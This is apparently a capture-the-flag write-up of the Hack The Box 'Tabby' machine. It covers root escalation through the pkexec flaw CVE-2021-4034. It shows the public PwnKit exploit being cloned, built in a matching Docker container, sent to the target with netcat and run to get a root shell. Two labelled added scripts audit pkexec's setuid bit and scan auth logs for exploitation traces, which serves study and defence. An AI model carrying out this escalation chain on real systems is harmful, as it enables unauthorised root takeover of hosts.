CVE-2021-4034


PEAS reported that the target system is vulnerable to CVE-2021-4034.

A vulnerability, which was classified as critical, has been found in Polkit (version unknown). This issue affects some unknown processing of the file /usr/bin/pkexec. The manipulation with an unknown input leads to an access control vulnerability. Using CWE to declare the problem leads to CWE-284: the software does not restrict, or incorrectly restricts, access to a resource from an unauthorized actor. Impacted are confidentiality, integrity, and availability.

The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when pkexec is invoked with an empty argument list. By manipulating environment variables, an attacker can trick pkexec into loading and executing arbitrary code with superuser privileges.
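The precondition the description above relies on is a setuid-root pkexec binary, and the interim mitigation published for this CVE was to drop that bit (chmod 0755 /usr/bin/pkexec) until the patched policykit-1 package is installed. The following shell script is an added example, not code from this writeup or from the polkit project: it audits a pkexec binary given as a parameter, reports whether it is still exposed, and prints (without applying) the mitigation. It assumes a POSIX `ls -ln` so it runs without GNU `stat`.

```shell
#!/bin/sh
# Added example, not from the writeup or the polkit project: audit whether a
# pkexec binary still carries the setuid-root bit, which is the precondition
# CVE-2021-4034 needs, and print the published interim mitigation (dropping
# that bit with chmod 0755 until the patched policykit-1 package is installed).
# The path is a parameter so the check can be pointed at any copy.

# Print one word describing the file: missing, not-setuid, setuid-root or
# setuid-other. Parses `ls -ln` (POSIX), so no GNU stat is required.
pkexec_status() {
    path="$1"
    [ -f "$path" ] || { echo missing; return 0; }
    set -- $(ls -ln "$path")          # $1 = mode string, $3 = numeric owner uid
    case "$1" in
        ???[sS]*)                      # fourth character is the setuid flag
            if [ "$3" = "0" ]; then echo setuid-root; else echo setuid-other; fi ;;
        *)  echo not-setuid ;;
    esac
}

# Return 0 (true) only when the binary is exposed: setuid and root-owned.
pkexec_exposed() {
    [ "$(pkexec_status "$1")" = "setuid-root" ]
}

# Print the interim mitigation for an exposed binary; it is not applied here.
pkexec_mitigation() {
    if pkexec_exposed "$1"; then
        echo "chmod 0755 $1   # interim: remove setuid until policykit-1 is patched"
    else
        echo "no action needed for $1"
    fi
}

# Stand-alone use: report on the path named in the advisory.
pkexec_status /usr/bin/pkexec
pkexec_mitigation /usr/bin/pkexec
```

On a patched host the binary is still setuid-root (pkexec needs it to work), so the status alone does not prove vulnerability; it tells you whether the mitigation is in place, and the installed package version still has to be compared against the distribution's advisory.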

Exploit (PwnKit)


A public exploit is available online.

tomcat@tabby:~$ make ; gcc ; cc
 
Command 'make' not found, but can be installed with:
 
apt install make        # version 4.2.1-1.2, or
apt install make-guile  # version 4.2.1-1.2
 
Ask your administrator to install one of them.
 
 
Command 'gcc' not found, but can be installed with:
 
apt install gcc
Please ask your administrator.
 
 
Command 'cc' not found, but can be installed with:
 
apt install gcc              # version 4:9.3.0-1ubuntu2, or
apt install clang            # version 1:10.0-50~exp1
apt install pentium-builder  # version 0.21ubuntu1
apt install tcc              # version 0.9.27-8
 
Ask your administrator to install one of them.

The target system does not appear to have any compiler installed, so the PEAS finding was a false positive in this respect.

Opting for remote compilation instead.

Docker Exploit Development


┌──(kali㉿kali)-[~/archive/htb/labs/tabby]
└─$ docker run -it --entrypoint "/bin/bash" --name tabby ubuntu:20.04  
root@bab8b16d0a2c:/# ldd --version
ldd (Ubuntu GLIBC 2.31-0ubuntu9.9) 2.31
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Starting a Docker container (ubuntu:20.04) that matches the target's distribution and glibc version (2.31).

root@bab8b16d0a2c:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git ; cd root

Installing necessary packages

root@bab8b16d0a2c:~# git clone https://github.com/berdav/CVE-2021-4034.git ; cd CVE-2021-4034 
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
unpacking objects: 100% (92/92), 22.69 KiB | 749.00 KiB/s, done.

Cloning the exploit repository.

root@bab8b16d0a2c:~/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true gconv_path=./pwnkit.so:.

Compiling the exploit.

root@bab8b16d0a2c:~/CVE-2021-4034# cd ../ ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
root@bab8b16d0a2c:~# nc 10.10.10.194 2222 < ./CVE-2021-4034.tar.gz
tomcat@tabby:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on 0.0.0.0 2222
Connection received on 10.10.16.5 56392

Transfer complete: the archive was sent with netcat from the attacking host (10.10.16.5) to a listener on the target.

Exploitation


tomcat@tabby:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Extracting the compiled exploit package.

tomcat@tabby:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
tabby
# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.194  netmask 255.255.255.0  broadcast 10.10.10.255
        ether 00:50:56:b9:7b:bb  txqueuelen 1000  (Ethernet)
        RX packets 2503197  bytes 409923556 (409.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2553538  bytes 1291405025 (1.2 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 25953  bytes 2019645 (2.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 25953  bytes 2019645 (2.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lxdbr0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.219.239.1  netmask 255.255.255.0  broadcast 0.0.0.0
        inet6 fe80::216:3eff:fe96:99ed  prefixlen 64  scopeid 0x20<link>
        inet6 fd42:5a1c:7ce3:6a6c::1  prefixlen 64  scopeid 0x0<global>
        ether 00:16:3e:96:99:ed  txqueuelen 1000  (Ethernet)
        RX packets 15  bytes 1516 (1.5 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 29  bytes 3934 (3.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth05df50ac: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether 9a:59:6f:92:8f:ff  txqueuelen 1000  (Ethernet)
        RX packets 15  bytes 1726 (1.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 29  bytes 3934 (3.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System-level compromise: the shell returned by the exploit runs as root on tabby.
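From the defender's side, the question after a session like the one above is what this leaves behind. The Qualys advisory for CVE-2021-4034 names two messages that pkexec writes to the auth log when it rejects an unsafe environment as traces left by some exploitation attempts, and also notes that exploitation without any log trace is possible, so a clean log is not proof of absence. The script below is an added example, not part of the writeup: it scans a syslog-style auth log for those two messages and lists the invoking accounts for triage. The sample log lines are constructed for this example (host, user and address reused from the writeup; pids and timestamps invented), and the match patterns are substrings so minor wording differences between polkit versions do not matter.

```shell
#!/bin/sh
# Added example, not from the writeup: scan a syslog-style auth log for the two
# messages pkexec logs when it rejects an environment it considers unsafe.
# The Qualys advisory for CVE-2021-4034 names these as traces left by some
# exploitation attempts and notes that trace-free exploitation is possible,
# so an empty result is not a clean bill of health.

# Constructed sample data for this example: host, user and source address are
# reused from the writeup; pids and timestamps are invented.
SAMPLE_AUTH_LOG='Mar  3 14:02:11 tabby pkexec[2244]: tomcat: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=/dev/pts/0] [CWD=/dev/shm] [COMMAND=]
Mar  3 14:02:12 tabby pkexec[2244]: tomcat: The value for environment variable XAUTHORITY contains suspicious content [USER=root] [TTY=/dev/pts/0] [CWD=/dev/shm] [COMMAND=]
Mar  3 14:05:01 tabby CRON[2301]: pam_unix(cron:session): session opened for user root by (uid=0)
Mar  3 14:06:40 tabby sshd[2310]: Accepted password for tomcat from 10.10.16.5 port 50112 ssh2'

# Keep only pkexec lines carrying one of the two indicator messages (stdin -> stdout).
# Substring patterns on purpose: the exact wording varies slightly across versions.
pkexec_indicator_lines() {
    grep 'pkexec\[' | grep -e 'SHELL variable was not found' \
                           -e 'contains suspicious content' || true
}

# Print the number of indicator lines read from stdin.
pkexec_indicator_count() {
    pkexec_indicator_lines | wc -l | tr -d ' '
}

# Print the distinct local accounts named in indicator lines (the user that
# invoked pkexec), one per line, sorted, for triage.
pkexec_indicator_users() {
    pkexec_indicator_lines | sed -n 's/.*pkexec\[[0-9]*\]: \([^:]*\):.*/\1/p' | sort -u
}

# Stand-alone use: scan a real log when a path is given, otherwise the sample.
log="${1:-}"
if [ -n "$log" ]; then
    pkexec_indicator_count < "$log"
    pkexec_indicator_users < "$log"
else
    printf '%s\n' "$SAMPLE_AUTH_LOG" | pkexec_indicator_count
    printf '%s\n' "$SAMPLE_AUTH_LOG" | pkexec_indicator_users
fi
```

Run it as `sh scan.sh /var/log/auth.log` (path is an assumption; Debian-family systems log authpriv there). A hit from a low-privilege service account such as tomcat, with `[CWD=/dev/shm]`, is the pattern to escalate: a world-writable, memory-backed directory is exactly where a transferred build like the one above would be staged.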